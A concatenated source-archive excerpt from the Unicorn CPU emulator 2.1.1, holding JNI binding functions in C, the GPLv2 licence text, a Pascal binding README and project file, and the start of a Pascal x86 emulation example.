hooksLong[hooksCount++] = (jlong)hooks[1]; jlongArray result = (*env)->NewLongArray(env, hooksCount); if (result == NULL) { goto fail; } (*env)->SetLongArrayRegion(env, result, 0, hooksCount, hooksLong); uc_err err = uc_mmio_map((uc_engine *)uc, address, size, (hooks[0] ? cb_mmio_read : NULL), hooks[0], (hooks[1] ? cb_mmio_write : NULL), hooks[1]); if (err != UC_ERR_OK) { throwUnicornException(env, err); goto fail; } return result; fail: deleteHookWrapper(env, hooks[0]); deleteHookWrapper(env, hooks[1]); return NULL; } /* * Class: unicorn_Unicorn * Method: _mem_map * Signature: (JJJI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1map(JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong size, jint perms) { uc_err err = uc_mem_map((uc_engine *)uc, address, size, perms); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_map_ptr * Signature: (JJLjava/nio/Buffer;I)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1map_1ptr( JNIEnv *env, jclass clazz, jlong uc, jlong address, jobject buf, jint perms) { jlong size = (*env)->GetDirectBufferCapacity(env, buf); void *host_address = (*env)->GetDirectBufferAddress(env, buf); if (size < 0 || host_address == NULL) { throwCustomUnicornException(env, "mem_map_ptr requires a direct buffer"); return; } uc_err err = uc_mem_map_ptr((uc_engine *)uc, address, size, perms, host_address); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_unmap * Signature: (JJJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1unmap(JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong size) { uc_err err = uc_mem_unmap((uc_engine *)uc, address, size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_protect * Signature: (JJJI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1protect( JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong size, jint perms) { uc_err err = uc_mem_protect((uc_engine *)uc, address, size, perms); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_regions * Signature: (J)[Lunicorn/MemRegion; */ JNIEXPORT jobjectArray JNICALL Java_unicorn_Unicorn__1mem_1regions(JNIEnv *env, jclass uc_clazz, jlong uc) { static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/MemRegion"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "", "(JJI)V"); if (!clazzInit) return NULL; } uc_mem_region *regions = NULL; uint32_t count = 0; uint32_t i; uc_err err = uc_mem_regions((uc_engine *)uc, ®ions, &count); if (err != UC_ERR_OK) { throwUnicornException(env, err); return NULL; } jobjectArray result = (*env)->NewObjectArray(env, (jsize)count, clazz, NULL); if (!result) { uc_free(regions); return NULL; } for (i = 0; i < count; i++) { jobject mr = (*env)->NewObject(env, clazz, clazzInit, (jlong)regions[i].begin, (jlong)regions[i].end, (jint)regions[i].perms); if (!mr) { uc_free(regions); return NULL; } (*env)->SetObjectArrayElement(env, result, (jsize)i, mr); } uc_free(regions); return result; } /* * Class: unicorn_Unicorn * Method: _context_alloc * Signature: (J)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1context_1alloc(JNIEnv *env, jclass clazz, jlong uc) { uc_context *ctx; uc_err err = uc_context_alloc((uc_engine *)uc, &ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return (jlong)ctx; } /* * Class: unicorn_Unicorn * Method: _context_free * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1context_1free(JNIEnv *env, jclass clazz, jlong ctx) { uc_err err = uc_context_free((uc_context *)ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _context_save * Signature: (JJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1context_1save(JNIEnv *env, jclass clazz, jlong uc, jlong ctx) { uc_err err = uc_context_save((uc_engine *)uc, (uc_context *)ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _context_restore * Signature: (JJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1context_1restore(JNIEnv *env, jclass clazz, jlong uc, jlong ctx) { uc_err err = uc_context_restore((uc_engine *)uc, (uc_context *)ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_get_mode * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1mode(JNIEnv *env, jclass clazz, jlong uc) { int mode; uc_err err = uc_ctl_get_mode((uc_engine *)uc, &mode); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return mode; } /* * Class: unicorn_Unicorn * Method: _ctl_get_arch * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1arch(JNIEnv *env, jclass clazz, jlong uc) { int arch; uc_err err = uc_ctl_get_arch((uc_engine *)uc, &arch); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return arch; } /* * Class: unicorn_Unicorn * Method: _ctl_get_timeout * Signature: (J)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1ctl_1get_1timeout(JNIEnv *env, jclass clazz, jlong uc) { uint64_t timeout; uc_err err = uc_ctl_get_timeout((uc_engine *)uc, &timeout); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return timeout; } /* * Class: unicorn_Unicorn * Method: _ctl_get_page_size * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1page_1size(JNIEnv *env, jclass clazz, jlong uc) { uint32_t page_size; uc_err err = uc_ctl_get_page_size((uc_engine *)uc, &page_size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return page_size; } /* * Class: unicorn_Unicorn * Method: _ctl_set_page_size * Signature: (JI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1page_1size( JNIEnv *env, jclass clazz, jlong uc, jint page_size) { uc_err err = uc_ctl_set_page_size((uc_engine *)uc, (uint32_t)page_size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_set_use_exits * Signature: (JZ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1use_1exits( JNIEnv *env, jclass clazz, jlong uc, jboolean value) { uc_err err; if (value) { err = uc_ctl_exits_enable((uc_engine *)uc); } else { err = uc_ctl_exits_disable((uc_engine *)uc); } if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_get_exits_cnt * Signature: (J)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1ctl_1get_1exits_1cnt(JNIEnv *env, jclass clazz, jlong uc) { size_t exits_cnt; uc_err err = uc_ctl_get_exits_cnt((uc_engine *)uc, &exits_cnt); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return exits_cnt; } /* * Class: unicorn_Unicorn * Method: _ctl_get_exits * Signature: (J)[J */ JNIEXPORT jlongArray JNICALL Java_unicorn_Unicorn__1ctl_1get_1exits(JNIEnv *env, jclass clazz, jlong uc) { size_t exits_cnt; uc_err err = uc_ctl_get_exits_cnt((uc_engine *)uc, &exits_cnt); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } jlongArray result = (*env)->NewLongArray(env, (jsize)exits_cnt); if (!result) return NULL; jlong *resultArr = (*env)->GetLongArrayElements(env, result, NULL); if (!resultArr) return NULL; err = uc_ctl_get_exits((uc_engine *)uc, (uint64_t *)resultArr, exits_cnt); (*env)->ReleaseLongArrayElements(env, result, resultArr, 0); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return result; } /* * Class: unicorn_Unicorn * Method: _ctl_set_exits * Signature: (J[J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1exits(JNIEnv *env, jclass clazz, jlong uc, jlongArray exits) { jsize count = (*env)->GetArrayLength(env, exits); jlong *arr = (*env)->GetLongArrayElements(env, exits, NULL); if (!arr) return; uc_err err = uc_ctl_set_exits((uc_engine *)uc, (uint64_t *)arr, (size_t)count); (*env)->ReleaseLongArrayElements(env, exits, arr, JNI_ABORT); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_get_cpu_model * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1cpu_1model(JNIEnv *env, jclass clazz, jlong uc) { int cpu_model; uc_err err = uc_ctl_get_cpu_model((uc_engine *)uc, &cpu_model); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return cpu_model; } /* * Class: unicorn_Unicorn * Method: _ctl_set_cpu_model * Signature: (JI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1cpu_1model( JNIEnv *env, jclass clazz, jlong uc, jint cpu_model) { uc_err err = uc_ctl_set_cpu_model((uc_engine *)uc, (int)cpu_model); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_request_cache * Signature: (JJ)Lunicorn/TranslationBlock; */ JNIEXPORT jobject JNICALL Java_unicorn_Unicorn__1ctl_1request_1cache( JNIEnv *env, jclass clazz, jlong uc, jlong address) { uc_tb tb; uc_err err = uc_ctl_request_cache((uc_engine *)uc, (uint64_t)address, &tb); if (err != UC_ERR_OK) { throwUnicornException(env, err); return NULL; } return makeTranslationBlock(env, &tb); } /* * Class: unicorn_Unicorn * Method: _ctl_remove_cache * Signature: (JJJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1remove_1cache( JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong end) { uc_err err = uc_ctl_remove_cache((uc_engine *)uc, (uint64_t)address, (uint64_t)end); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_flush_tb * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1flush_1tb(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_ctl_flush_tb((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_flush_tlb * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1flush_1tlb(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_ctl_flush_tlb((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_tlb_mode * Signature: (JI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1tlb_1mode(JNIEnv *env, jclass clazz, jlong uc, jint mode) { uc_err err = uc_ctl_tlb_mode((uc_engine *)uc, (int)mode); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } unicorn-2.1.1/bindings/pascal/000077500000000000000000000000001467524106700162445ustar00rootroot00000000000000unicorn-2.1.1/bindings/pascal/LICENSE000066400000000000000000000431301467524106700172520ustar00rootroot00000000000000GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) 2018 Coldzer0 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. {signature of Ty Coon}, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License.unicorn-2.1.1/bindings/pascal/README.md000066400000000000000000000024271467524106700175300ustar00rootroot00000000000000# unicorn-engine-pascal Pascal/Delphi language binding for the [Unicorn emulator](http://www.unicorn-engine.org/) ([GitHub](https://github.com/unicorn-engine/unicorn)). *Unicorn* is a lightweight multi-platform, multi-architecture CPU emulator framework based on [QEMU](http://www.qemu.org/). ## License `GPLv2` ## Compilers Compatibility #### Free Pascal >= v3 - `Mac OS` - `Windows` - `Linux` #### Delphi - `Windows` ## Features * Same API as the C core - with some workarounds for Pascals case insensitivity: `uc_mem_write()` -> `uc_mem_write_()`, `uc_mem_read()` -> `uc_mem_read_()` - and the missing feature passing variable number of arguments to functions (`...`): i solve it by using -> `args : Array of Const;` you can pass args inside [] like : ```pascal uc_hook_add(uc, trace, UC_HOOK_INSN, @HookIn, nil, 1,0,[UC_X86_INS_IN]; ``` the main loader in `Unicorn_dyn.pas` , check X86 example for more info . * Multiplatform (Mac OS , Windows and Linux are tested) ## Examples * `X86` Emulate 16, 32, 64 Bit x86 ## Version History * `1.1` * Add Delphi Compatibility [ Windows ] * `1.0` * this is the first version it has all APIs of UNICORN v1.0.1 ## TODO - Add more Examples - Add Mac , Linux Support for Delphiunicorn-2.1.1/bindings/pascal/examples/000077500000000000000000000000001467524106700200625ustar00rootroot00000000000000unicorn-2.1.1/bindings/pascal/examples/x86.lpi000066400000000000000000000056411467524106700212230ustar00rootroot00000000000000 <UseAppBundle Value="False"/> <ResourceType Value="res"/> </General> <BuildModes Count="3"> <Item1 Name="Default" Default="True"/> <Item2 Name="Debug"> <CompilerOptions> <Version Value="11"/> <Target> <Filename Value="x86"/> </Target> <SearchPaths> <IncludeFiles Value="$(ProjOutDir)"/> <OtherUnitFiles Value="../unicorn"/> <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> </SearchPaths> <Linking> <Debugging> <UseHeaptrc Value="True"/> <TrashVariables Value="True"/> <UseExternalDbgSyms Value="True"/> </Debugging> </Linking> </CompilerOptions> </Item2> <Item3 Name="Release"> <CompilerOptions> <Version Value="11"/> <Target> <Filename Value="x86"/> </Target> <SearchPaths> <IncludeFiles Value="$(ProjOutDir)"/> <OtherUnitFiles Value="../unicorn"/> <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> </SearchPaths> <CodeGeneration> <SmartLinkUnit Value="True"/> <Optimizations> <OptimizationLevel Value="3"/> </Optimizations> </CodeGeneration> <Linking> <Debugging> <GenerateDebugInfo Value="False"/> </Debugging> <LinkSmart Value="True"/> </Linking> </CompilerOptions> </Item3> </BuildModes> <PublishOptions> <Version Value="2"/> </PublishOptions> <RunParams> <local> <FormatVersion Value="1"/> <CommandLineParams Value="-32"/> </local> </RunParams> <Units Count="1"> <Unit0> <Filename Value="x86.lpr"/> <IsPartOfProject Value="True"/> </Unit0> </Units> </ProjectOptions> <CompilerOptions> <Version Value="11"/> <Target> <Filename Value="x86"/> </Target> <SearchPaths> <IncludeFiles Value="$(ProjOutDir)"/> <OtherUnitFiles Value="../unicorn"/> <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> </SearchPaths> </CompilerOptions> <Debugging> <Exceptions Count="3"> <Item1> <Name Value="EAbort"/> </Item1> <Item2> <Name Value="ECodetoolError"/> </Item2> <Item3> <Name Value="EFOpenError"/> </Item3> </Exceptions> </Debugging> </CONFIG> �����������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/examples/x86.lpr������������������������������������������������������0000664�0000000�0000000�00000076754�14675241067�0021251�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������{ FreePascal/Delphi bindings for the UnicornEngine Emulator Engine . Copyright(c) 2018 Coldzer0 . License : GPLv2 . } program x86; {$IFDEF FPC} {$MODE Delphi} {$ENDIF} {$ifdef MSWINDOWS} {$apptype CONSOLE} {$endif} uses SysUtils, Unicorn_dyn, UnicornConst, X86Const; const // code to be emulated . X86_CODE32: array[0..6] of Byte = ($41, $4a,$66,$0f,$ef,$c1, $00); // INC ecx; DEC edx ; PXOR xmm0, xmm1 ; X86_CODE32_JUMP: array[0..8] of Byte = ($eb, $02, $90, $90, $90, $90, $90, $90, $00); // jmp 4; nop; nop; nop; nop; nop; nop ; X86_CODE32_LOOP: array[0..4] of Byte = ($41, $4a, $eb, $fe, $00); // INC ecx; DEC edx; JMP self-loop X86_CODE32_MEM_WRITE: array[0..8] of Byte = ($89, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx ; X86_CODE32_MEM_READ: array[0..8] of Byte = ($8b, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx ; X86_CODE32_JMP_INVALID: array[0..6] of Byte = ($e9, $e9, $ee, $ee, $41, $4a, $00); // JMP outside; INC ecx; DEC edx ; X86_CODE32_INOUT: array[0..7] of Byte = ($41, $E4, $3F, $4a, $E6, $46, $43, $00); // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx ; X86_CODE32_INC : array[0..1] of byte = ($40,$00); // INC eax . X86_CODE64: array[0..75] of Byte = ( $41, $BC, $3B, $B0, $28, $2A, $49, $0F, $C9, $90, $4D, $0F, $AD, $CF, $49, $87, $FD, $90, $48, $81, $D2, $8A, $CE, $77, $35, $48, $F7, $D9, $4D, $29, $F4, $49, $81, $C9, $F6, $8A, $C6, $53, $4D, $87, $ED, $48, $0F, $AD, $D2, $49, $F7, $D4, $48, $F7, $E1, $4D, $19, $C5, $4D, $89, $C5, $48, $F7, $D6, $41, $B8, $4F, $8D, $6B, $59, $4D, $87, $D0, $68, $6A, $1E, $09, $3C, $59, $00); X86_CODE16: array[0..2] of Byte = ($00, $00, $00); // add byte ptr [bx + si], al X86_CODE64_SYSCALL: array[0..2] of Byte = ($0f, $05, $00); // SYSCALL // memory address where emulation starts ADDRESS = $1000000; // callback for tracing basic blocks procedure HookBlock(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; begin WriteLn(Format('>>> Tracing basic block at 0x%x, block size = 0x%x', [address, size])); end; // callback for tracing instruction procedure HookCode(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; var eflags: integer; begin WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); uc_reg_read(uc, UC_X86_REG_EFLAGS, @eflags); WriteLn(Format('>>> --- EFLAGS is 0x%x', [eflags])); end; // callback for tracing instruction procedure HookCode64(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; var rip: UInt64; begin WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); uc_reg_read(uc, UC_X86_REG_RIP, @rip); WriteLn(Format('>>> --- RIP is 0x%x', [rip])); end; function HookMemInvalid(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer): LongBool; cdecl; begin case _type of UC_MEM_WRITE_UNMAPPED: begin WriteLn(Format('>>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); // map this memory in with 2MB in size uc_mem_map(uc, $aaaa0000, 2 * 1024*1024, UC_PROT_ALL); // return true to indicate we want to continue Result := true; end else begin // return false to indicate we want to stop emulation Result := false; end; end; end; procedure HookMem64(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; 